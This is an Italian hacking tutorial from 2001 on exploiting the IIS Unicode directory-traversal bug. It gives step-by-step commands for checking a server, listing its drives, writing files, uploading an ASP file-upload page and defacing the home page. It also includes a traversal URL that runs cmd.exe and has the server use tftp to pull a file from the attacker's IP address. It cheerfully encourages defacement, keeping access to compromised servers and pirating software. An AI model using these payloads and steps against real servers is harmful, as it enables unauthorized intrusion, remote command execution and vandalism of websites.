Agosto-2001

            
                            .:La Grande Guida AllHacking Di IIS:.            
                                                                                
                                       [realizzata da]                          
                       ___                                                      
                      /     __   __  |/  |__   __   __  |/   ___   __           
                      \___ (__) (__) |\ |__) (__) (__) |\ (__/_ |  '          
                                                                                
                                                                                
                                            ___                                 
                                           (__/_                                
                                                                                
                     _                                                          
                    |_  ___  |   _|_   __   __    __  __   __   __              
                    |  (__/_ |_,  |_, (__) |  ) __)  |__) |  ' (__( (__|        
                                                     |                _|        
            


2.2 Unicode

[Sistemi vulnerabili: Windows NT con IIS 2-3-4-5]

[Exploit: unitools, uni1.pl, uni2.pl, uni3.pl, check.pl ]

[Vulnerabilit]

il bug del unicode  un bug nella serie di caratteri di UNICODE che  installata con 
IIS2.0/5.0 che funziona solitamente su NT4/Win2k rispettivamente. La cosa "divertente" con unicode,  che l' exploit differisce per ogni serie di caratteri di UNICODE. Per esempio, se state utilizzando un server di IIS che  in cinese (cn), quindi sta usando una serie di caratteri differente di UNICODE ai sistemi inglesi (del uk). E cos l' exploit  differente secondo la serie di caratteri di UNICODE nell'uso.

Potete usare questo bug in tre modi, direttamente da browser (cosa che vi sconsiglio) oppure dal prompt di ms-dos o, scelta consigliata, da shell.

Ma dato che lexploit da consoll  pi immediato spiego per l :-) 

Per testare la vulnerabilit di un server dovete usare il file "check.pl" per utilizzarlo dovete ovviamente avere instalato "ActivePerl" ( www.activeperl.com ).

Invece per i linuxiani basta solo usare il comando

Perl check.pl www.microsoft.com:80

Il programma esegue un test e alla fine dopo pochissimo vi dice:

Salvo
Buchiamolo

Ovviamente se dice salvo cambiate exploit se dice Buchiamolo eseguite i comandi riportati qui:

la scelta poi cade su 3 file: uni1.pl uni2.pl uni3.pl la differenza c e la spiego dopo

Adesso vale anche per i windowsiani perch una volta installato active perl anche per voi basta scrivere perl.....

Perl uni1.pl www.microsoft.com:80 dir+c:\




Abbiamo usato il uni1.pl perch  il pi veloce a far osservare i dati,a questo punto ci sono due possibilit:

O vi dice errore di ecc ecc ecc  
O vi elenca i vari file 
se vi da errore lasciate perdere unicode e provatene un altro! Se invece vi da le cartelle per adesso va tutto bene basta solo che conosciate i comandi dos.

Adesso entra di nuovo il fattore delle scelte in base a ci che vogliamo fare:


1) Conserviamo laccesso al sistema
2) Creiamo un file di testo e spieghiamo come siamo entrati
4)	Defacciamo il sito


a)	Consiglio di si visto che tantissimi server sono afflitti da sto bug
b)	Se non vi fate niente del server, create il file spiegando come siete entrati e basta poi uscite :-)
c)	Siiii Defacciamo!!!!! :-) come ben sapete io scelgo le due opzioni Creo il testo e defaccio ma il bello con lunicode   che abbiamo unarma molto pi potente anzi due: unicodeloader.pl oppure il tftp (consiglio unicodeloader dopo spiego meglio!).


Spieghiamo come creare il file di testo oppure come defacciare (approfondito)

Per creare il file di testo, mettiamo in c, dobbiamo scrivere:

perl uni2.pl() www.microsoft.com:80 "echo+OWNED+BY+ETCC > c:\hacked.txt"

	non lo dovete scrivere quando date il comando  solo una mia nota per farvi capire che adesso usiamo il 2 di uni perch  molto + potente ed  sicuro che compie il lavoro (?).


Defacciamento

Qui il discorso diventa pi tecnico e pi serio con grandi soddisfazioni nel suo risultato (sono sempre commosso quando defaccio un IIS visto il tempo perso nel creare qualcosa che far ricordare di me e la mia grande soddisfazione di riuscita, alla fine di tutto nelle conclusioni spiegher il mio concetto di defaced).


Come al solito  importantissimo trovare la webroot, noterete che nei server dove entrerete trovate spesso in ogni parte le pagine index.htm e default.htm, e anche diverse cartelle come inetpub in pi drive con un po di ricerca si capisce qual  la giusta posizione della webroot quindi  solo questione di pratica. Adesso che avete trovato la sua giusta ubicazione avete due scelte:

Fare un defaced scrivendo solo hacked by VostroNick

Fare un defaced cambiando tutta la home page cosi da aggiungere immagini scritte colorate suoni effeti dhtml anche creazioni flash insomma tutto cio che volete.

Sono sicuro che scegliete la seconda opzione (hehe) ma le spiego tutte e due:

Per fare il defaced normale basta che scriviate

Perl uni2.pl www.microsoft.com:80 "echo+OWNED+By+ecc > x:\webroot\index(?)"

Adesso ho saltato due cose che spiego qui:

x:\ lo dovete sostituire con il vero drive

index(?) lo dovete sostituire con il vero nome della prima pagine sia home che index o default lestenzione non lho scritta neanche perch dipende se  htm, html o asp.

Es: c:\inetpub\wwwroot\default.htm

Adesso spieghiamo unaltro pacchetto exploit unitools. Estraiamo i file 

Upload.asp
Upload.inc
Unicodexecute3.pl
Unicodeloader.pl 

Mettiamo tutto in c:\perl\bin ritorniamo nel nostro prompt di ms-dos (consoll per i linuxiani) e lanciamo il comando

Perl unicodeloader.pl www.microsoft.com:80 webroot

La webroot dobbiamo vedere qual ad esempio d:\inetpub\wwwroot

Una volta eseguito il comando comincia la fase di uploading ed automaticamente vengono inviati al server i file upload.asp ed upload.inc (ovviamente un po ci mette) appena sono arrivati scrivete nel vostro browser:

http://www.microsoft.com/upload.asp 

e si aprir magicamente una pagina che vi invita ad inviare file al server (uahaha) quindi come gi avete capito potete inviare ci che volete naturalmente noi ci prepariamo una nostra paginetta fatta con un programma tutta spettacolo (hehe) facciamo le modifiche solo nel campo immagine dove vi dice il sorgente da dellimmagine al posto di lasciare che ne so c:\immagini\foto.jpg scrivetegli
http://www.microsoft.com/foto.jpg fatto ci uploadate la pagina e le varie immagini ovviamente alla pagina date il nome della pagine che  online (index,default).


Errori frequenti:

Ad esempio mentre state sovrascrivendo un file o anche rinonimando non ve lo esegue e li potete anche non pensare + al defaced ma solo per avere informazioni riservate del server. Comunque quando eseguite uni1.pl uni2.pl uni3.pl in qualche azione del tipo rinomina o sovrascrivi o crea, vi da tanti errori non ci fate caso esegue lo stesso le operazioni per esserne pi sicuri fate un dir di nuovo e vedete che lo spazio del file diminuisce nettamente :-).

TFTP

Eccoci qui a spiegare una tecnica che pu farvi uploadare file verso il server, anche se in modo 
un p pi rischioso, useremo un programma che si chiama Tftp pro suite che lo potete scaricare
direttamente da www.download.com e scaricarvi anche il crack visto che  un programma a pagamento
ovviamente andremo su astalavista.box.sk :) Una volta installato e crakkato dovete andare nelle 
propiet ed inserire come path la directory dove sono contenuti i file che vorreste inviare
al server (consiglio di creare una cartella apposita cosi da non dover cambiare continuemente path).
Aprite il server sul vostro pc e prendetevi un caff :P

Adesso andiamo nel nostro browser e scriviamo:

http://www.microsoft.com/directory/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20tftp%20-i%20200.200.200.200%20get%20c:\windows\calc.exe%20c:\winnt\system32\calc.exe

Spiego il tutto senn uscite pazzi hehehe:

http://www.microsoft.com    il server in cui vogliamo uppare la pagine.
/directory/ dovete usare una delle directory dove  possibile exploittare il cmd.exe oppure potete lavorare con un exploit tipo l'unicode (dopo spiego in dettaglio.
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20     HEeheheh :)
tftp%20-i%20200.200.200.200     il 200.200.200.200 dovete sostituirlo con il vostro ip!
get%20c:\windows\calc.exe   ovviamente imponiamo di mandare il file contenuto in c:\windows\calc.exe (voi dite se posso uppare dalla cartella che voglio perch mi hai fatto impostare la path? Hehe spiegher dopo :P)
%20c:\winnt\system32\calc.exe     la cartella dove volete che finisca il file (ma se uploadavo default.htm e la sistemavo in intetpub/wwwroot che succedeva? uahahahah)

%20 per i pi lamer  il esadecimale lo spazio per separare le parole...


Adesso spieghiamo come  possibile usare questo metodo con altri exploit:

Prendiamo in considerazione l'unicode, mettiamo caso che con l'unitool non riusciamo ad uploadare default.asp, non possiamo defacciare cambiando tutta la pagina quindi cosa facciamo?
usiamo il tftp :P per notiamo che le varie cartelle non possono essere sfruttate per uscirci il cmd.exe quindi che facciamo? Usiamo l'unicode per attivare il tftp Uahahah
allora come al solito attiviamo la parte server sul nostro pc controllando la path adesso andiamo nel server vittima e scriviamo da MS-dos:

perl unicodeexecute2.pl www.microsoft.com:80 tftp -i MioIP c:\path 

heehhe adesso lo spiego meglio

perl unicodeexecute2.pl www.microsoft.com:80   non credo ve lo debba spiegare senn chiudete sto testo e leggetevi il CIOE' uahahah

tftp  il programma :)

-i l'opzione che serve a noi :)
Mio Ip   chiss che vorra dire... uahaha
c:\path bisogna scrivere il percorso che abbiamo messo nella path insieme al file che vogliamo mettiamo caso nella cartella creata e che abbiamo dichiarato come path  contenuto il file default.htm scriviamo

c:\hacker\default.htm

Una volta che lo avete inviato con l'unicodexecute2 spostatevi il file fino al wwwroot :-)

[Patch: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29787]
                           _________________________________________
                          [                                         ]
                          [            Copyright (C) 2001           ]
                          [                                         ]
                          [ FeltonSpray  - feltonspray@katamail.com ]
                          [                                         ]
                          [   Cookbooker - cookbooker@libero.it     ]
                          [                                         ]
                           